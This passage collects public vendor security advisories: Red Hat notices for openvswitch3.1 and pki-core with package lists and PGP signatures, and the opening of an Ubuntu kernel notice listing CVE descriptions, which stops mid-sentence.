/kSMi0LiPRArFgQXWfL4EWNKPnEBeLJQmaFO7grNPAi8k4cuuiHbx2NTByAdQKFg  
ayKoM1ntNB6KGBVQnhScsELj6lFZp/RiBWpocpj1nHVxlIdwmbIqU8UIDK26QvrJ  
xi7Xxtsl0ZQ=aTXK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1766-01

Red Hat Security Advisory 2023-1770-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch3.1 security update  
Advisory ID:       RHSA-2023:1770-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1770  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch3.1 is now available in Fast Datapath for Red Hat  
Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 9 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-9] Fast Datapath Release (BZ#2177688)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177688 - [23.C RHEL-9] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 9:

Source:  
openvswitch3.1-3.1.0-14.el9fdp.src.rpm

aarch64:  
openvswitch3.1-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.aarch64.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.aarch64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.aarch64.rpm

noarch:  
openvswitch3.1-test-3.1.0-14.el9fdp.noarch.rpm

ppc64le:  
openvswitch3.1-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.ppc64le.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.ppc64le.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.ppc64le.rpm

s390x:  
openvswitch3.1-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.s390x.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.s390x.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.s390x.rpm

x86_64:  
openvswitch3.1-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.x86_64.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.x86_64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaLtzjgjWX9erEAQgWtw//Q8Uf6a/o/eN5OJxyMupZANRTuKoPOXeu  
vUuwVU6oVNklao0FCs3BkMUfoGagZfHqJiVtaJBp48hpHWprZ6CJ6Prc18k/KIkY  
hhN/z42p1fLC+J4JzMuA3cODHVc0JkXuRT1wMfGYfKq4RLPaW6jADVSIGzTIZhc9  
YtppXWcpp5cEgvoF9/NtZspKggFUWuXj4BymJ7fzmxGpDkHkaMMdMX+9+qTevpyP  
Kj0G9YfdmmUGWAaZ3Fm5/vh8otoeTDOU83YgTl+kQrflPg/PJVuTAiJ3cjA+Sl1U  
yZDyUxNwgSwvJ4PJKMif6SrNsvv1PQpxK9UE9Q8JWVlXVwvPw5aHpj9bhk5Kmv3n  
t/x37zdKWPbldBeuQlNpXTNAZ1YFGd5PSzseR8fJXoyinhcT+ATC4mAyWhoq5+B5  
J7NLCxJDXfO8pzBbnv5whaDS3fztXbFpKQC5wC26x/az4Fci2+y2EX9TTxYTyA2P  
JZ0zp4wZpHHk78xoSPOMGuvURwl9NYGPQvLtztg6sOFx/XDwC3fws+SGTkeUJjfw  
xiAdisM4JAujDR0jiMRBe+WkElVF1uaT1KolLQPxu9kxcNuLJ/Qr62kBjsPfgkF0  
feZT3Uui2ZZhuX/F/z74OkKS+ke9dIeN75d6KpYiMfaJdYpRC2rmU6f1aQBfcVik  
dd1tBu49mHM=xop/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1770-01

Red Hat Security Advisory 2023-1747-01 - The Public Key Infrastructure Core contains fundamental packages required by Red Hat Certificate System.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pki-core:10.6 security update  
Advisory ID:       RHSA-2023:1747-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1747  
Issue date:        2023-04-12  
CVE Names:         CVE-2022-2414  
====================================================================  
1. Summary:

An update for the pki-core:10.6 module is now available for Red Hat  
Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Public Key Infrastructure (PKI) Core contains fundamental packages  
required by Red Hat Certificate System.

Security Fix(es):

* pki-core: access to external entities when parsing XML can lead to XXE  
(CVE-2022-2414)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2104676 - CVE-2022-2414 pki-core: access to external entities when parsing XML can lead to XXE

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.src.rpm  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.src.rpm  
pki-core-10.8.4-1.module+el8.2.0+17305+ef598dea.src.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.src.rpm

aarch64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm

noarch:  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
ldapjdk-javadoc-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
pki-base-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-base-java-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-ca-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-kra-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-server-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
python3-pki-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.noarch.rpm

ppc64le:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm

s390x:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm

x86_64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.src.rpm  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.src.rpm  
pki-core-10.8.4-1.module+el8.2.0+17305+ef598dea.src.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.src.rpm

aarch64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm

noarch:  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
ldapjdk-javadoc-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
pki-base-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-base-java-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-ca-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-kra-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-server-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
python3-pki-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.noarch.rpm

ppc64le:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm

s390x:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm

x86_64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.src.rpm  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.src.rpm  
pki-core-10.8.4-1.module+el8.2.0+17305+ef598dea.src.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.src.rpm

aarch64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm

noarch:  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
ldapjdk-javadoc-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
pki-base-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-base-java-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-ca-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-kra-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-server-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
python3-pki-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.noarch.rpm

ppc64le:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.ppc64le.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.ppc64le.rpm

s390x:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.s390x.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.s390x.rpm

x86_64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.x86_64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2414  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDcxWNzjgjWX9erEAQi/AA/9GNdQctKqRnMI2c+jyjs/LF5USS5Qx3dk  
axfQaGBzI7jYtBReNbGlVnlQzS+/DjiChUfl2m2YU1pAhhO3B7/Nd5t6xC9mMkUN  
Itvzu46P1pPCt0pURc+BEpC6PxIHq6cFpEeS9L52FFWjUTYKH/IeIb3Po0XGtyZ1  
lHIOjqvAZTXSi+7IR07pXBKNy03vUNVdVcRDqNkls9FFfKDsx11/KgoIksWxkBtC  
oiuhLaMzlsmmL2VC60ZbrGKBstOIalL+X1p1JmG3W5aRFiIu90MeyHpX1cQwldlD  
mWzKZUG/e8KI7iFufQZ6nsHGrCvREWDncpbUcRxilRI1jBPqI5cJfol2CKmrAMT7  
UWhn4WMfBGmKr7heUxemxJowFtlRSbzz0I95qW5J3JA74JjsMDxkLwWnTlLf70yo  
F71oy0IJWSdQ776bkR9oy7ZlcLioNhFEtGR9/kDc2AKdP1bc+hNZV2s/2UYC0aSj  
4Nx3gJp8g1PcnwDMJwL3KvxA4DWZ4YhJ2lInSqGQ37WyIr/7OPknjWaVdzb1unvl  
fRjWygiwJ90zEOv2gkyVAa01GrScO/xi6ppR1am6lXVGdUcmZYYs3jeL0ajEEkvo  
g/3hqWgqcai9a8DkaubbwhwPDpia+s38CjRQML3AD+k+02IZcOr1pcNFygy/BLyR  
TppOjgbEuAk=PPtl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1747-01

Ubuntu Security Notice 6014-1 - Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP implementation in the Linux kernel did not properly handle IPID assignment. A remote attacker could use this to cause a denial of service or inject forged data. Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk, Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre Variant 2 mitigations for AMD processors on Linux were insufficient in some situations. A local attacker could possibly use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6014-1  
April 12, 2023

linux, linux-kvm, linux-lts-xenial vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux: Linux kernel  
- linux-kvm: Linux kernel for cloud environments  
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP  
implementation in the Linux kernel did not properly handle IPID assignment.  
A remote attacker could use this to cause a denial of service (connection  
termination) or inject forged data. (CVE-2020-36516)

Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk,  
Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre  
Variant 2 mitigations for AMD processors on Linux were insufficient in some  
situations. A local attacker could possibly use this to expose sensitive  
information. (CVE-2021-26401)

Jürgen Groß discovered that the Xen subsystem within the Linux kernel did  
not adequately limit the number of events driver domains (unprivileged PV  
backends) could send to other guest VMs. An attacker in a driver domain  
could use this to cause a denial of service in other guest VMs.  
(CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)

Wolfgang Frisch discovered that the ext4 file system implementation in the  
Linux kernel contained an integer overflow when handling metadata inode  
extents. An attacker could use this to construct a malicious ext4 file  
system image that, when mounted, could cause a denial of service (system  
crash). (CVE-2021-3428)

It was discovered that the IEEE 802.15.4 wireless network subsystem in the  
Linux kernel did not properly handle certain error conditions, leading to a  
null pointer dereference vulnerability. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2021-3659)

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

Alois Wohlschlager discovered that the overlay file system in the Linux  
kernel did not restrict private clones in some situations. An attacker  
could use this to expose sensitive information. (CVE-2021-3732)

It was discovered that the SCTP protocol implementation in the Linux kernel  
did not properly verify VTAGs in some situations. A remote attacker could  
possibly use this to cause a denial of service (connection disassociation).  
(CVE-2021-3772)

It was discovered that the btrfs file system implementation in the Linux  
kernel did not properly handle locking in certain error conditions. A local  
attacker could use this to cause a denial of service (kernel deadlock).  
(CVE-2021-4149)

Jann Horn discovered that the socket subsystem in the Linux kernel  
contained a race condition when handling listen() and connect() operations,  
leading to a read-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2021-4203)

It was discovered that the file system quotas implementation in the Linux  
kernel did not properly validate the quota block number. An attacker could  
use this to construct a malicious file system image that, when mounted and  
operated on, could cause a denial of service (system crash).  
(CVE-2021-45868)

Zhihua Yao discovered that the MOXART SD/MMC driver in the Linux kernel did  
not properly handle device removal, leading to a use-after-free  
vulnerability. A physically proximate attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2022-0487)

It was discovered that the block layer subsystem in the Linux kernel did  
not properly initialize memory in some situations. A privileged local  
attacker could use this to expose sensitive information (kernel memory).  
(CVE-2022-0494)

It was discovered that the UDF file system implementation in the Linux  
kernel could attempt to dereference a null pointer in some situations. An  
attacker could use this to construct a malicious UDF image that, when  
mounted and operated on, could cause a denial of service (system crash).  
(CVE-2022-0617)

David Bouman discovered that the netfilter subsystem in the Linux kernel  
did not initialize memory in some situations. A local attacker could use  
this to expose sensitive information (kernel memory). (CVE-2022-1016)

It was discovered that the implementation of the 6pack and mkiss protocols  
in the Linux kernel did not handle detach events properly in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system crash).  
(CVE-2022-1195)

Duoming Zhou discovered race conditions in the AX.25 amateur radio protocol  
implementation in the Linux kernel, leading to use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash). (CVE-2022-1205)

It was discovered that the tty subsystem in the Linux kernel contained a  
race condition in certain situations, leading to an out-of-bounds read  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or expose sensitive information. (CVE-2022-1462)

It was discovered that the implementation of X.25 network protocols in the  
Linux kernel did not terminate link layer sessions properly. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-1516)

Duoming Zhou discovered a race condition in the NFC subsystem in the Linux  
kernel, leading to a use-after-free vulnerability. A privileged local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-1974)

Duoming Zhou discovered that the NFC subsystem in the Linux kernel did not  
properly prevent context switches from occurring during certain atomic  
context operations. A privileged local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-1975)

It was discovered that the HID subsystem in the Linux kernel did not  
properly validate inputs in certain conditions. A local attacker with  
physical access could plug in a specially crafted USB device to expose  
